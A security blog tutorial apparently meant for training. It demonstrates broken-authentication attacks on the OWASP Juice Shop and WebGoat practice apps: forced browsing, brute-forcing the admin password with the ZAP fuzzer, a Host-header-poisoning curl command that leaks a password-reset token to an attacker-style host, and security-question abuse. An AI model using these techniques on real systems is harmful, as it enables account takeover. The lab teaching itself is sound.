Skip to content
  • Home
  • OWASP Top 10
  • Bug bounty hunting
  • About
  • Contact
  • How to support
Broken authentication and session management tutorial

Broken Authentication and Session Management tutorial

April 22, 2021 by thehackerish

Hello and welcome to this new episode of the OWASP Top 10 training series. In this Broken Authentication and Session Management tutorial, you will practice put your knowledge into action on hands-on attack examples. If you don’t know the theory behind this vulnerability, I highly recommend you read it first and then come back.

In this Broken Authentication and Session Management tutorial, you will learn:

  • Authentication bypass attack example using forced browsing
  • Exploit Broken Authentication using Weak credentials
  • Broken Authentication and Session Management attacks example using a vulnerable password reset link
  • Exploit Broken Authentication using a security question

Authentication bypass attack example using forced browsing

In this example, your goal is to access the challenge board on OWASP Juice Shop, which is normally not meant to be public. Single Page Web applications (SPA) typically use Ajax calls from a Front-end application. Therefore, all API endpoints should be included somewhere client-side, like JavaScript files.

  1. Firstly, open Chrome Browser and visit Juice Shop
  2. Then, right-click on the page and choose Inspect 
  3. Under the Sources tab, choose the main-es2015.js file and beautify it using the {} button at the bottom of the window which shows the minified JavaScript file.
  4. Then, locate the part where endpoints are declared using Ctrl+F on Windows or Command+F on Mac
  5. From the list, you can see the score-board endpoint as shown below
Enumerating JS files using Chrome's Dev Tools
Enumerating JS files using Chrome’s Dev Tools
  1. Go to the URL: http://192.168.99.100:3000/#/score-board
  2. Finally, you should see the scoreboard containing all the challenges.

Exploit Broken Authentication using Weak credentials

Let’s try to login as the admin user on OWASP Juice Shop. From our previous SQL injection tutorial, we know that the admin’s email is admin@juice-sh.op. So, let’s brute force his password using the worst 100 password dictionary.

Because Burp Suite Community Edition allows only throttled Bruteforce, we are going to use OWASP ZAP for this challenge. It is also a great opportunity to learn how to use OWASP ZAP in such a use case.

Capturing the vulnerable request on OWASP ZAP

  1. Firstly, make sure that OWASP ZAP is properly configured.
  2. Make sure that you have OWASP Juice Shop running.
  3. On the Juice Shop top menu, click on the Account button, then on the Login button.
OWASP Juice Shop Login feature
OWASP Juice Shop Login feature
  1. Then, enter admin@juice-sh.op in the email and a dummy password, and hit enter.
  2. You should see a POST request coming through Zaproxy’s History tab.
OWASP ZAP HTTP capture
OWASP ZAP HTTP capture
  1. As you can see, the response code is 401, which means that our authentication has failed.
  2. On the request View, you can see the full POST request, including the POST data.
OWASP ZAP showing the vulnerable login request
OWASP ZAP showing the vulnerable login request

Brute force the admin password

  1. Now, right-click on the request, and choose the Fuzz option.
Fuzz option in the OWASP ZAP contextual menu
Fuzz option in the OWASP ZAP contextual menu
  1. Then, select the password field from the POST data of the login request and click on the Add button on the right.
OWAP ZAP Fuzz menu
OWAP ZAP Fuzz menu
  1. Make sure that the payload type is Strings. Then, copy paste the list of passwords from the password dictionary and hit OK.
Login dictionary to test for  Broken Authentication
Login dictionary to test for Broken Authentication
  1. Finally, run the fuzzer, you should see a new Tab named Fuzzer appearing. After a while, the fuzzing finishes. You should see that we have a response code of 200 for the password admin123, meaning that the password we sent in that particular request is the admin’s password.
 Broken Authentication and Session Management tutorial: Password found
Broken Authentication and Session Management tutorial: Password found

Broken Authentication and Session Management attacks example using a vulnerable password reset link

In this challenge, your goal is to hijack Tom’s password reset link and takeover his account on OWASP WebGoat.

Capturing the vulnerable password reset request

  1. Firstly, make sure that you have OWASP WebGoat and WebWolf up and running.
  2. Then, go to the password reset challenge number 6, as shown below
 Broken Authentication and Session Management tutorial
Broken Authentication and Session Management tutorial
  1. Next, scroll down and notice that you have the ability to reset your account’s password using the forgot password feature.
 Broken Authentication and Session Management tutorial: password reset form
Broken Authentication and Session Management tutorial: password reset form
  1. Then, in the history tab of OWASP ZAP, you can see a POST request as shown below
OWASP ZAP captured the password reset POST request
OWASP ZAP captured the password reset POST request
  1. The POST request looks like this:
Password reset POST request
Password reset POST request

Exploiting the Password Reset feature

  1. Now, note your cookie Header and email POST data, we will use them to construct the following curl command.
curl http://192.168.99.100:8080/WebGoat/PasswordReset/ForgotPassword/create-password-reset-link -H "Host: 192.168.99.100:9090/landing/evil" -b "JSESSIONID=Y-rAgt6BZhL5vY2yJaGH4Mx5ZPugPcK8WnwEd44Z" --data "email=tom%40webgoat-cloud.org"
  1. In the request above, the -H option allows to add our own HTTP Headers. In this case, we poisoned the HTTP Host Header to point to http://192.168.99.100:9090/landing/evil. That way, we can capture the request made to /evil on WebWolf. In a real-life situation, the Host Header would point to a server controlled by the attacker. The -b option allows to add the Cookie, and the –data option allows to add the POST data.
  2. After executing the curl command above, you can see that you get a request to WebWolf under the Incoming Requests menu, like the one below
WebWolf captured the password reset token
WebWolf captured the password reset token
  1. Finally, we successfully hijacked the password reset link! Let’s copy it and use it in a legitimate password reset link. To do that, all you need is to send a password reset request to your email account, which is <user>@webgoat-cloud.org. On WebWolf, you can receive incoming emails on the Mailbox tab from the top menu.
Broken Authentication and Session Management tutorial: Password reset link structure
Password reset link structure
  1. As you can see, the password reset token looks like this: http://192.168.99.100:8080/WebGoat/PasswordReset/reset/reset-password/<password-reset-token>
  2. All we have to do now is substitute <password-reset-token> with the one we hijacked earlier and visit the web page. You should see a password reset form as shown below.
Broken Authentication and Session Management tutorial: Tom's Password reset form
Broken Authentication and Session Management tutorial: Tom’s Password reset form
  1. Fill the password with whatever you want, then login as Tom using the new password.
Challenge solved! Successful Tom's account takeover
Challenge solved! Successful Tom’s account takeover
  1. Congratulations! You have compromised Tom’s password using a weak password reset feature.

Exploit Broken Authentication using a security question

You might think that security questions are secret, but it’s not quite the case. With the number of personal data people share on social media nowadays, security question answers can be found relatively easily. In this challenge, we are going to reset Bjoern’s password and access his account using a security answer he publicly shared.

In his talk, Bjoern shared that he owns a three-legged cat named Zaya. He used his email bjoern@owasp.org.

  1. Firstly, go to the login from the top menu.
  2. Then, choose forgot your password option at the bottom of the login form.
  3. Finally, enter bjoern@owasp.org as the email, Zaya as the answer to the security question and a new password for Bjoern.
  4. Congratulations! You can authenticate as Bjoern in Juice Shop.

As you can see, there are a lot of attack vectors which can be used to exploit a Broken Authentication and Session Management feature. Hopefully, you’ve learned something new.

New content will be released in the future. If you enjoy learning on this blog, make sure to subscribe to the newsletter below. We will send you updates each Friday!

If you enjoy learning by watching videos, here is one:

Post navigation

Previous Post:

SQL injection examples for practice

Next Post:

Broken Authentication and Session Management explained

2 Commments

  1. WdPoker says:
    April 20, 2021 at 6:21 am

    Marvelous, what a web site it is! This blog presents helpful information to
    us, keep it up.

    1. thehackerish says:
      April 22, 2021 at 6:31 pm

      Many thanks! Enjoy reading and learning!

Comments are closed.

Get my FREE Udemy course

Hack like a white hat hacker - A practical introduction

Is pentesting the right job for you? MyFREE Udemy course will help you answer it through a practical pentest mission example.

Enroll for FREE

Overcome your struggles and become a successful bug bounty hunter!

Master bug bounty hunting through Anna's journey, uncovering the mindset, tactics, and skills needed to thrive and succeed in the game

Read it NOW

Categories

  • burp suite
  • Hacking
    • bug bounty
    • Penetration testing
    • red team
  • OWASP
    • OWASP juice shop
    • OWASP Top 10
      • OWASP Top 10 training
      • OWASP Top 10 vulnerabilities
    • OWASP WebGoat
    • OWASP ZAP
  • Secure coding
  • Uncategorized

Overcome your struggles and become a successful bug bounty hunter!

Get you Free hacking lab VM

free-hacking-lab-vm
free-hacking-lab-vm
© 2025 thehackerish | Built using WordPress and SuperbThemes